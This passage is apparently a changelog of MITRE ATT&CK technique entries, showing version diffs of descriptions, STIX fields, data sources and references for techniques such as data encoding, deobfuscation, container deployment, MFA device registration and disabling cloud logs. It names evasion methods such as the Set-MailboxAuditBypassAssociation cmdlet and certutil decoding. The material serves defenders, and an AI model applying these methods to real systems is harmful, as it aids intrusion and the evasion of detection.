Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
external_references[2]['source_name']Register DeloitteDetectify Slack Tokens
external_references[2]['description']Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020.
external_references[2]['url']https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/
external_references[3]['source_name']Register UberGitHub truffleHog
external_references[3]['description']McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020.Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.
external_references[3]['url']https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/https://github.com/dxa4481/truffleHog
external_references[4]['source_name']Detectify Slack TokensRegister Uber
external_references[4]['description']Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020.McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020.
external_references[4]['url']https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/
external_references[5]['source_name']Forbes GitHub CredsGitHub Gitrob
external_references[5]['description']Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020.Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.
external_references[5]['url']https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196https://github.com/michenriksen/gitrob
external_references[6]['source_name']GitHub truffleHogCNET Leaks
external_references[6]['description']Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.
external_references[6]['url']https://github.com/dxa4481/truffleHoghttps://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/
external_references[7]['source_name']GitHub GitrobOkta Scatter Swine 2022
external_references[7]['description']Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.Okta. (2022, August 25). Detecting Scatter Swine: Insights into a Relentless Phishing Campaign. Retrieved February 24, 2023.
external_references[7]['url']https://github.com/michenriksen/gitrobhttps://sec.okta.com/scatterswine
external_references[8]['source_name']CNET LeaksForbes GitHub Creds
external_references[8]['description']Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020.
external_references[8]['url']https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Register Deloitte', 'description': "Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.", 'url': 'https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/'}

[T1132] Data Encoding

Current version: 1.2

Version changed from: 1.1 → 1.2

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-03-14 23:39:50.338000+00:002023-04-21 12:20:20.711000+00:00
external_references[1]['source_name']Wikipedia Binary-to-text EncodingUniversity of Birmingham C2
external_references[1]['description']Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
external_references[1]['url']https://en.wikipedia.org/wiki/Binary-to-text_encodinghttps://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
external_references[2]['source_name']Wikipedia Character EncodingWikipedia Binary-to-text Encoding
external_references[2]['description']Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.
external_references[2]['url']https://en.wikipedia.org/wiki/Character_encodinghttps://en.wikipedia.org/wiki/Binary-to-text_encoding
external_references[3]['source_name']University of Birmingham C2Wikipedia Character Encoding
external_references[3]['description']Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.
external_references[3]['url']https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdfhttps://en.wikipedia.org/wiki/Character_encoding
x_mitre_version1.11.2

[T1005] Data from Local System

Current version: 1.6

Version changed from: 1.5 → 1.6


Old Description
New Description
t1Adversaries may search local system sources, such as file syt1Adversaries may search local system sources, such as file sy
>stems and configuration files or local databases, to find fi>stems and configuration files or local databases, to find fi
>les of interest and sensitive data prior to Exfiltration.  A>les of interest and sensitive data prior to Exfiltration.  A
>dversaries may do this using a [Command and Scripting Interp>dversaries may do this using a [Command and Scripting Interp
>reter](https://attack.mitre.org/techniques/T1059), such as [>reter](https://attack.mitre.org/techniques/T1059), such as [
>cmd](https://attack.mitre.org/software/S0106) as well as a [>cmd](https://attack.mitre.org/software/S0106) as well as a [
>Network Device CLI](https://attack.mitre.org/techniques/T105>Network Device CLI](https://attack.mitre.org/techniques/T105
>9/008), which have functionality to interact with the file s>9/008), which have functionality to interact with the file s
>ystem to gather information. Adversaries may also use [Autom>ystem to gather information.(Citation: show_run_config_cmd_c
>ated Collection](https://attack.mitre.org/techniques/T1119) >isco) Adversaries may also use [Automated Collection](https:
>on the local system. >//attack.mitre.org/techniques/T1119) on the local system. 

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-19 21:55:54.866000+00:002023-04-12 23:54:39.466000+00:00
descriptionAdversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
external_references[1]['source_name']Mandiant APT41 Global Intrusion show_run_config_cmd_cisco
external_references[1]['description']Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.Cisco. (2022, August 16). show running-config - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.
external_references[1]['url']https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploitshttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_protocols_through_showmon.html#wp2760878733
external_references[2]['source_name']US-CERT-TA18-106AMandiant APT41 Global Intrusion
external_references[2]['description']US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.
external_references[2]['url']https://www.us-cert.gov/ncas/alerts/TA18-106Ahttps://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Process: OS API ExecutionCommand: Command Execution
x_mitre_data_sources[1]File: File AccessProcess: Process Creation
x_mitre_data_sources[2]Process: Process CreationFile: File Access
x_mitre_data_sources[3]Script: Script ExecutionProcess: OS API Execution
x_mitre_data_sources[4]Command: Command ExecutionScript: Script Execution
x_mitre_detectionMonitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to collect files such as configuration files with built-in features native to the network device platform.(Citation: Mandiant APT41 Global Intrusion )(Citation: US-CERT-TA18-106A) Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to collect files such as configuration files with built-in features native to the network device platform.(Citation: Mandiant APT41 Global Intrusion )(Citation: US-CERT-TA18-106A) Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). For network infrastructure devices, collect AAA logging to monitor `show` commands that view configuration files.
x_mitre_version1.51.6
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'}

[T1140] Deobfuscate/Decode Files or Information

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may use [Obfuscated Files or Information](https:t1Adversaries may use [Obfuscated Files or Information](https:
>//attack.mitre.org/techniques/T1027) to hide artifacts of an>//attack.mitre.org/techniques/T1027) to hide artifacts of an
> intrusion from analysis. They may require separate mechanis> intrusion from analysis. They may require separate mechanis
>ms to decode or deobfuscate that information depending on ho>ms to decode or deobfuscate that information depending on ho
>w they intend to use it. Methods for doing that include buil>w they intend to use it. Methods for doing that include buil
>t-in functionality of malware or by using utilities present >t-in functionality of malware or by using utilities present 
>on the system.  One such example is use of [certutil](https:>on the system.  One such example is the use of [certutil](ht
>//attack.mitre.org/software/S0160) to decode a remote access>tps://attack.mitre.org/software/S0160) to decode a remote ac
> tool portable executable file that has been hidden inside a>cess tool portable executable file that has been hidden insi
> certificate file. (Citation: Malwarebytes Targeted Attack a>de a certificate file.(Citation: Malwarebytes Targeted Attac
>gainst Saudi Arabia) Another example is using the Windows <c>k against Saudi Arabia) Another example is using the Windows
>ode>copy /b</code> command to reassemble binary fragments in> <code>copy /b</code> command to reassemble binary fragments
>to a malicious payload. (Citation: Carbon Black Obfuscation > into a malicious payload.(Citation: Carbon Black Obfuscatio
>Sept 2016)  Sometimes a user's action may be required to ope>n Sept 2016)  Sometimes a user's action may be required to o
>n it for deobfuscation or decryption as part of [User Execut>pen it for deobfuscation or decryption as part of [User Exec
>ion](https://attack.mitre.org/techniques/T1204). The user ma>ution](https://attack.mitre.org/techniques/T1204). The user 
>y also be required to input a password to open a password pr>may also be required to input a password to open a password 
>otected compressed/encrypted file that was provided by the a>protected compressed/encrypted file that was provided by the
>dversary. (Citation: Volexity PowerDuke November 2016)> adversary. (Citation: Volexity PowerDuke November 2016)

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-05 04:05:42.508000+00:002023-04-21 12:21:06.026000+00:00
descriptionAdversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system. One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016) Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system. One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016) Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1610] Deploy Container

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'root']
values_changed
STIX FieldOld valueNew Value
modified2022-04-01 13:14:58.939000+00:002023-04-15 16:13:40.232000+00:00
external_references[1]['source_name']Docker Containers APIAqua Build Images on Hosts
external_references[1]['description']Docker. (n.d.). Docker Engine API v1.41 Reference - Container. Retrieved March 29, 2021.Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.
external_references[1]['url']https://docs.docker.com/engine/api/v1.41/#tag/Containerhttps://blog.aquasec.com/malicious-container-image-docker-container-host
external_references[2]['source_name']Kubernetes DashboardDocker Containers API
external_references[2]['description']The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). Retrieved March 29, 2021.Docker. (n.d.). Docker Engine API v1.41 Reference - Container. Retrieved March 29, 2021.
external_references[2]['url']https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/https://docs.docker.com/engine/api/v1.41/#tag/Container
external_references[4]['source_name']Aqua Build Images on HostsKubernetes Dashboard
external_references[4]['description']Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). Retrieved March 29, 2021.
external_references[4]['url']https://blog.aquasec.com/malicious-container-image-docker-container-hosthttps://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/
x_mitre_data_sources[1]Container: Container CreationApplication Log: Application Log Content
x_mitre_data_sources[3]Application Log: Application Log ContentContainer: Container Creation
x_mitre_version1.11.2

[T1098.005] Account Manipulation: Device Registration

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may register a device to an adversary-controlledt1Adversaries may register a device to an adversary-controlled
> account. Devices may be registered in a multifactor authent> account. Devices may be registered in a multifactor authent
>ication (MFA) system, which handles authentication to the ne>ication (MFA) system, which handles authentication to the ne
>twork, or in a device management system, which handles devic>twork, or in a device management system, which handles devic
>e access and compliance.  MFA systems, such as Duo or Okta, >e access and compliance.  MFA systems, such as Duo or Okta, 
>allow users to associate devices with their accounts in orde>allow users to associate devices with their accounts in orde
>r to complete MFA requirements. An adversary that compromise>r to complete MFA requirements. An adversary that compromise
>s a user’s credentials may enroll a new device in order to b>s a user’s credentials may enroll a new device in order to b
>ypass initial MFA requirements and gain persistent access to>ypass initial MFA requirements and gain persistent access to
> a network.(Citation: CISA MFA PrintNightmare)(Citation: Dar> a network.(Citation: CISA MFA PrintNightmare)(Citation: Dar
>kReading FireEye SolarWinds)  Similarly, an adversary with e>kReading FireEye SolarWinds) In some cases, the MFA self-enr
>xisting access to a network may register a device to Azure A>ollment process may require only a username and password to 
>D and/or its device management system, Microsoft Intune, in >enroll the account's first device or to enroll a device to a
>order to access sensitive data or resources while bypassing >n inactive account. (Citation: Mandiant APT29 Microsoft 365 
>conditional access policies.(Citation: AADInternals - Device>2022)  Similarly, an adversary with existing access to a net
> Registration)(Citation: AADInternals - Conditional Access B>work may register a device to Azure AD and/or its device man
>ypass)(Citation: Microsoft DEV-0537)   Devices registered in>agement system, Microsoft Intune, in order to access sensiti
> Azure AD may be able to conduct [Internal Spearphishing](ht>ve data or resources while bypassing conditional access poli
>tps://attack.mitre.org/techniques/T1534) campaigns via intra>cies.(Citation: AADInternals - Device Registration)(Citation
>-organizational emails, which are less likely to be treated >: AADInternals - Conditional Access Bypass)(Citation: Micros
>as suspicious by the email client.(Citation: Microsoft - Dev>oft DEV-0537)   Devices registered in Azure AD may be able t
>ice Registration) Additionally, an adversary may be able to >o conduct [Internal Spearphishing](https://attack.mitre.org/
>perform a [Service Exhaustion Flood](https://attack.mitre.or>techniques/T1534) campaigns via intra-organizational emails,
>g/techniques/T1499/002) on an Azure AD tenant by registering> which are less likely to be treated as suspicious by the em
> a large number of devices.(Citation: AADInternals - BPRT)>ail client.(Citation: Microsoft - Device Registration) Addit
 >ionally, an adversary may be able to perform a [Service Exha
 >ustion Flood](https://attack.mitre.org/techniques/T1499/002)
 > on an Azure AD tenant by registering a large number of devi
 >ces.(Citation: AADInternals - BPRT)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-25 16:26:53.204000+00:002023-04-20 18:14:17.197000+00:00
descriptionAdversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance. MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance. MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022) Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)
external_references[2]['source_name']AADInternals - Conditional Access BypassMandiant APT29 Microsoft 365 2022
external_references[2]['description']Dr. Nestori Syynimaa. (2020, September 6). Bypassing conditional access by faking device compliance. Retrieved March 4, 2022.Douglas Bienstock. (2022, August 18). You Can’t Audit Me: APT29 Continues Targeting Microsoft 365. Retrieved February 23, 2023.
external_references[2]['url']https://o365blog.com/post/mdmhttps://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft
external_references[3]['source_name']AADInternals - BPRTAADInternals - Conditional Access Bypass
external_references[3]['description']Dr. Nestori Syynimaa. (2021, January 31). BPRT unleashed: Joining multiple devices to Azure AD and Intune. Retrieved March 4, 2022.Dr. Nestori Syynimaa. (2020, September 6). Bypassing conditional access by faking device compliance. Retrieved March 4, 2022.
external_references[3]['url']https://o365blog.com/post/bprt/https://o365blog.com/post/mdm
external_references[4]['source_name']AADInternals - Device RegistrationAADInternals - BPRT
external_references[4]['description']Dr. Nestori Syynimaa. (2021, March 3). Deep-dive to Azure AD device join. Retrieved March 9, 2022.Dr. Nestori Syynimaa. (2021, January 31). BPRT unleashed: Joining multiple devices to Azure AD and Intune. Retrieved March 4, 2022.
external_references[4]['url']https://o365blog.com/post/devices/https://o365blog.com/post/bprt/
external_references[5]['source_name']DarkReading FireEye SolarWindsAADInternals - Device Registration
external_references[5]['description']Kelly Jackson Higgins. (2021, January 7). FireEye's Mandia: 'Severity-Zero Alert' Led to Discovery of SolarWinds Attack. Retrieved April 18, 2022.Dr. Nestori Syynimaa. (2021, March 3). Deep-dive to Azure AD device join. Retrieved March 9, 2022.
external_references[5]['url']https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attackhttps://o365blog.com/post/devices/
external_references[6]['source_name']Microsoft - Device RegistrationDarkReading FireEye SolarWinds
external_references[6]['description']Microsoft 365 Defender Threat Intelligence Team. (2022, January 26). Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA. Retrieved March 4, 2022.Kelly Jackson Higgins. (2021, January 7). FireEye's Mandia: 'Severity-Zero Alert' Led to Discovery of SolarWinds Attack. Retrieved April 18, 2022.
external_references[6]['url']https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfahttps://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack
external_references[7]['source_name']Microsoft DEV-0537Microsoft - Device Registration
external_references[7]['description']Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.Microsoft 365 Defender Threat Intelligence Team. (2022, January 26). Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA. Retrieved March 4, 2022.
external_references[7]['url']https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]User Account: User Account ModificationActive Directory: Active Directory Object Creation
x_mitre_data_sources[1]Active Directory: Active Directory Object CreationUser Account: User Account Modification
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft DEV-0537', 'description': 'Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.', 'url': 'https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/'}
x_mitre_contributorsJoe Gumke, U.S. Bank

[T1562.008] Impair Defenses: Disable Cloud Logs

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1An adversary may disable cloud logging capabilities and intet1An adversary may disable cloud logging capabilities and inte
>grations to limit what data is collected on their activities>grations to limit what data is collected on their activities
> and avoid detection.   Cloud environments allow for collect> and avoid detection. Cloud environments allow for collectio
>ion and analysis of audit and application logs that provide >n and analysis of audit and application logs that provide in
>insight into what activities a user does within the environm>sight into what activities a user does within the environmen
>ent. If an adversary has sufficient permissions, they can di>t. If an adversary has sufficient permissions, they can disa
>sable logging to avoid detection of their activities. For ex>ble logging to avoid detection of their activities.  For exa
>ample, in AWS an adversary may disable CloudWatch/CloudTrail>mple, in AWS an adversary may disable CloudWatch/CloudTrail 
> integrations prior to conducting further malicious activity>integrations prior to conducting further malicious activity.
>.(Citation: Following the CloudTrail: Generating strong AWS >(Citation: Following the CloudTrail: Generating strong AWS s
>security signals with Sumo Logic)>ecurity signals with Sumo Logic) In Office 365, an adversary
 > may disable logging on mail collection activities for speci
 >fic users by using the `Set-MailboxAuditBypassAssociation` c
 >mdlet, by disabling M365 Advanced Auditing for the user, or 
 >by downgrading the user’s license from an Enterprise E5 to a
 >n Enterprise E3 license.(Citation: Dark Reading Microsoft 36
 >5 Attacks 2021)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2022-03-08 21:55:27.505000+00:002023-04-20 18:13:50.277000+00:00
descriptionAn adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)
external_references[1]['source_name']Following the CloudTrail: Generating strong AWS security signals with Sumo LogicStopping CloudTrail from Sending Events to CloudWatch Logs
external_references[1]['description']Dan Whalen. (2019, September 10). Following the CloudTrail: Generating strong AWS security signals with Sumo Logic. Retrieved October 16, 2020.Amazon Web Services. (n.d.). Stopping CloudTrail from Sending Events to CloudWatch Logs. Retrieved October 16, 2020.
external_references[1]['url']https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html
external_references[2]['source_name']Stopping CloudTrail from Sending Events to CloudWatch LogsFollowing the CloudTrail: Generating strong AWS security signals with Sumo Logic
external_references[2]['description']Amazon Web Services. (n.d.). Stopping CloudTrail from Sending Events to CloudWatch Logs. Retrieved October 16, 2020.Dan Whalen. (2019, September 10). Following the CloudTrail: Generating strong AWS security signals with Sumo Logic. Retrieved October 16, 2020.
external_references[2]['url']https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.htmlhttps://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/
external_references[4]['source_name']az monitor diagnostic-settingsDark Reading Microsoft 365 Attacks 2021
external_references[4]['description']Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved October 16, 2020.Kelly Sheridan. (2021, August 5). Incident Responders Explore Microsoft 365 Attacks in the Wild. Retrieved March 17, 2023.
external_references[4]['url']https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_deletehttps://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591
